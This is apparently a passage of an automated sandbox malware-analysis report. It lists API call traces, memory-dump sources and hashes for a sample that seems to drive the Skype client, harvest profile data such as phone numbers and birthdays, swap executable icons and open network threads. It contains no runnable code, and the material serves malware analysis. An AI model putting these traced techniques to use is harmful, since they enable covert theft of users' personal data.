                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: ShowWindow.USER32(00000000,00000001,?,?,?), ref: 00414454
                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0041C901
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 0041C908
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0041C90F
                                                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,0042A440), ref: 0041C917
                                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,000000FF,?,?,?,?,00000040), ref: 0041C93C
                                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 0041C973
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 0041C97B
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041C999
                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 0041C9AC
                                                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 0041C9B9
                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 0041C9BC
                                                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 0041C9C3
                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 0041C9C6
                                                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 0041C9CD
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0041C9D1
                                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000100,00000009,00000000), ref: 0041C9EE
                                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000100,00000026,00000000), ref: 0041C9F6
                                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000100,0000000D,00000000), ref: 0041C9FE
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0041CA73
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 0041CA80
                                                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 0041CAC7
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0041CB3C
                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000005), ref: 0041CB46
                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 0041CB4F
                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 0041CB5B
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$Focus$ForegroundRect$MessagePostShow$MetricsSleepSystem$DesktopTextlstrlen$ClassCountNameTickVisible
                                                                                                                                                                                                                                                      • String ID: tSkACLForm.$tSkMainForm.$tSkNotify
                                                                                                                                                                                                                                                      • API String ID: 3615854559-155394806
                                                                                                                                                                                                                                                      • Opcode ID: 9b82ce25023f09f4f641c2b1a6fed4b20d919e2426a02ab249a4bd5809e70122
                                                                                                                                                                                                                                                      • Instruction ID: 33e34fc2864a5c1f50d125138dd43901c9e19477e55f8c9ec2e9d27e71862bec
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b82ce25023f09f4f641c2b1a6fed4b20d919e2426a02ab249a4bd5809e70122
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08B1E671940208BFEB11EFA4DC85FEF3B78EF05714F100056F904A6291DB799A91DBA9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041E95A
                                                                                                                                                                                                                                                        • Part of subcall function 0041D048: EnterCriticalSection.KERNEL32(0045B020), ref: 0041D055
                                                                                                                                                                                                                                                        • Part of subcall function 0041D048: lstrlenA.KERNEL32(?), ref: 0041D066
                                                                                                                                                                                                                                                        • Part of subcall function 0041D048: SendMessageA.USER32(0000004A,00000000), ref: 0041D082
                                                                                                                                                                                                                                                        • Part of subcall function 0041D048: LeaveCriticalSection.KERNEL32(0045B020), ref: 0041D092
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041E969
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041E977
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041E985
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041E993
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041E9A1
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041E9AF
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041E9BD
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041E9CB
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041E9D9
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041E9E7
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041E9F5
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041EA03
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041EA11
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041EA1F
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041EA29
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041EA37
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Sleep$CriticalSection$EnterLeaveMessageSendlstrlen
                                                                                                                                                                                                                                                      • String ID: GET CURRENTUSERHANDLE$GET PROFILE ABOUT$GET PROFILE BIRTHDAY$GET PROFILE CITY$GET PROFILE COUNTRY$GET PROFILE FULLNAME$GET PROFILE HOMEPAGE$GET PROFILE IPCOUNTRY$GET PROFILE MOOD_TEXT$GET PROFILE PHONE_HOME$GET PROFILE PHONE_MOBILE$GET PROFILE PHONE_OFFICE$GET PROFILE PSTN_BALANCE$GET PROFILE SEX$GET PROFILE TIMEZONE
                                                                                                                                                                                                                                                      • API String ID: 2946355272-1195147660
                                                                                                                                                                                                                                                      • Opcode ID: 0e05c6c380154905a828118fb1f3ec784fd830000eda53cf48dd39c78da103a4
                                                                                                                                                                                                                                                      • Instruction ID: 0586fa8bb1ab81b82726b65ea7d9d3e3f81e2f51b5616a92291bba97b2517846
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0e05c6c380154905a828118fb1f3ec784fd830000eda53cf48dd39c78da103a4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE11B792F9152C3950253276BC8BD7F4F2CC9C9B7DBA4041FF504491831F8C29C6A9BA
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • FindResourceA.KERNEL32(?,?,?), ref: 0040902E
                                                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 00409042
                                                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 0040904F
                                                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 0040905D
                                                                                                                                                                                                                                                      • UpdateResourceA.KERNEL32(?,?,?,?,?,00000000), ref: 00409074
                                                                                                                                                                                                                                                      • LookupIconIdFromDirectoryEx.USER32(?,00000001,00000010,00000010,00000000), ref: 00409086
                                                                                                                                                                                                                                                      • FindResourceA.KERNEL32(?,?,00000003), ref: 00409097
                                                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 004090A3
                                                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 004090A6
                                                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,?), ref: 004090B1
                                                                                                                                                                                                                                                      • UpdateResourceA.KERNEL32(?,00000003,?,?,?,00000000), ref: 004090C6
                                                                                                                                                                                                                                                      • LookupIconIdFromDirectoryEx.USER32(?,00000001,00000030,00000030,00000000), ref: 004090D8
                                                                                                                                                                                                                                                      • FindResourceA.KERNEL32(?,?,00000003), ref: 004090E9
                                                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 004090F5
                                                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 004090F8
                                                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,?), ref: 00409103
                                                                                                                                                                                                                                                      • UpdateResourceA.KERNEL32(?,00000003,?,?,?,00000000), ref: 00409118
                                                                                                                                                                                                                                                      • LookupIconIdFromDirectoryEx.USER32(?,00000001,00000020,00000020,00000000), ref: 0040912A
                                                                                                                                                                                                                                                      • FindResourceA.KERNEL32(?,?,00000003), ref: 0040913B
                                                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 00409147
                                                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 0040914A
                                                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,?), ref: 00409155
                                                                                                                                                                                                                                                      • UpdateResourceA.KERNEL32(?,00000003,?,?,?,00000000), ref: 0040916A
                                                                                                                                                                                                                                                      • FindResourceA.KERNEL32(?,00000000,00000003), ref: 0040917E
                                                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 0040918E
                                                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 00409191
                                                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,?), ref: 0040919C
                                                                                                                                                                                                                                                      • UpdateResourceA.KERNEL32(?,00000003,?,?,?,00000000), ref: 004091B3
                                                                                                                                                                                                                                                      • FreeResource.KERNEL32(?), ref: 004091CE
                                                                                                                                                                                                                                                      • FreeResource.KERNEL32(?), ref: 004091D4
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Resource$FindLoadLockSizeofUpdate$DirectoryFromIconLookup$Free
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4293049711-0
                                                                                                                                                                                                                                                      • Opcode ID: a1d6c37a740b477b33ebc72f89dac7cc81a38640dfe682816ad91298d220abaf
                                                                                                                                                                                                                                                      • Instruction ID: 117c28e06bb043129752a4c397bc6654641652e639958cb8c3de27d6e2a33916
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1d6c37a740b477b33ebc72f89dac7cc81a38640dfe682816ad91298d220abaf
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3E512E71518300BFE7125F61DD05F2FBAEDFF89B04F400919FA84A1160C676CA219F6A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(user32.dll,0042C208,?,?,00000000,0042C278,00000008,00424DB3), ref: 0042816A
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00428186
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00428197
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004281A4
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 004281BA
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 004281CB
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                      • String ID: $GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$user32.dll
                                                                                                                                                                                                                                                      • API String ID: 2238633743-752805172
                                                                                                                                                                                                                                                      • Opcode ID: c2cec2979fd55be9cd4a166be65f200ccb460f2b7fc8e12480f4fc6254f4e7c0
                                                                                                                                                                                                                                                      • Instruction ID: 72c22d4f7f03d427608bec40e611ae1e70230dce0bfe9de60929506030e41661
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2cec2979fd55be9cd4a166be65f200ccb460f2b7fc8e12480f4fc6254f4e7c0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F4219830B01765EAD7209FA4BC84B6F7AA89B45B41F90007FE500D6192EEB8D9119B7E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00001770,00000000,?,00000000,000003E8,?,00404494,?,?,00000000,00000000,?,?,?,00000000,00000002), ref: 0040E8C5
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,http://,?,?,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0040E8F7
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E901
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,00000000,?,?,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0040E90D
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040E94C
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E964
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000400,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E979
                                                                                                                                                                                                                                                      • htons.WS2_32(00000000), ref: 0040E9B1
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,0040E690,00000000,00000000,?), ref: 0040EA64
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,0040DDC2,00000000,00000000,?), ref: 0040EA7E
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000032), ref: 0040EA89
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrcpy$CreateSleepThread$CountTickhtonslstrcatlstrlen
                                                                                                                                                                                                                                                      • String ID: http://
                                                                                                                                                                                                                                                      • API String ID: 3177099081-1121587658
                                                                                                                                                                                                                                                      • Opcode ID: e830a236873730002828955a5455564e52cdf548c6e0eef8d29869c03a7d8624
                                                                                                                                                                                                                                                      • Instruction ID: ce0d3c27ecb2eeb20cac135d9def360aaa073816567bcac841eaba6cd55d9888
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e830a236873730002828955a5455564e52cdf548c6e0eef8d29869c03a7d8624
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5151D4B0604744EFC7219F35C845AD77BA8BF05314F00083EF96E96292D738A925CB6D
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CompareStringW.KERNEL32(00000000,00000000,0042B908,00000001,0042B908,00000001,0042C4D8,00000040,00427184,00000001,?,00000000,00422306,00000000,?,0042413A), ref: 0042906F
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,0042413A,00000000,76AF0F00,00000000,776AC310,C:\Windows\system32\), ref: 00429081
                                                                                                                                                                                                                                                      • GetCPInfo.KERNEL32(76AF0F00,00000000,0042C4D8,00000040,00427184,00000001,?,00000000,00422306,00000000,?,0042413A,00000000,76AF0F00,00000000,776AC310), ref: 0042912B
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(76AF0F00,00000009,00000000,?,00000000,00000000,?,0042413A,00000000,76AF0F00,00000000,776AC310,C:\Windows\system32\), ref: 004291B9
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(76AF0F00,00000001,00000000,?,?,00000000,?,0042413A,00000000,76AF0F00,00000000,776AC310,C:\Windows\system32\), ref: 00429232
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(76AF0F00,00000009,776AC310,00000000,00000000,00000000,?,0042413A,00000000,76AF0F00,00000000,776AC310,C:\Windows\system32\), ref: 0042924F
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(76AF0F00,00000001,776AC310,00000000,?,00000000,?,0042413A,00000000,76AF0F00,00000000,776AC310,C:\Windows\system32\), ref: 004292C5
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$CompareErrorInfoLastString
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1773772771-0
                                                                                                                                                                                                                                                      • Opcode ID: e32b7b48b83c6e9d5d1115c6ec31c10b8bff38056a486a14eaf21c473df95895
                                                                                                                                                                                                                                                      • Instruction ID: 508109000cae9e2cdd248d7729261c4b8c559b822e122794a458f7e770b08d33
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e32b7b48b83c6e9d5d1115c6ec31c10b8bff38056a486a14eaf21c473df95895
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FAB1AF71B00269EBDF21CF65EC85AAE7BB5EF48710F90001BF814A62A1D7398D61CB59
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32(76AF0A60,00000000,?,?,?,?,00422CAF,?,0042B7F8,00000060), ref: 0042584C
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,00422CAF,?,0042B7F8,00000060), ref: 00425860
                                                                                                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32(76AF0A60,00000000,?,?,?,?,00422CAF,?,0042B7F8,00000060), ref: 00425882
                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,76AF0A60,00000000,?,?,?,?,00422CAF), ref: 004258B6
                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,00422CAF,?,0042B7F8,00000060), ref: 004258D8
                                                                                                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,00422CAF,?,0042B7F8,00000060), ref: 004258F1
                                                                                                                                                                                                                                                      • GetEnvironmentStrings.KERNEL32(76AF0A60,00000000,?,?,?,?,00422CAF,?,0042B7F8,00000060), ref: 00425907
                                                                                                                                                                                                                                                      • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00425943
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
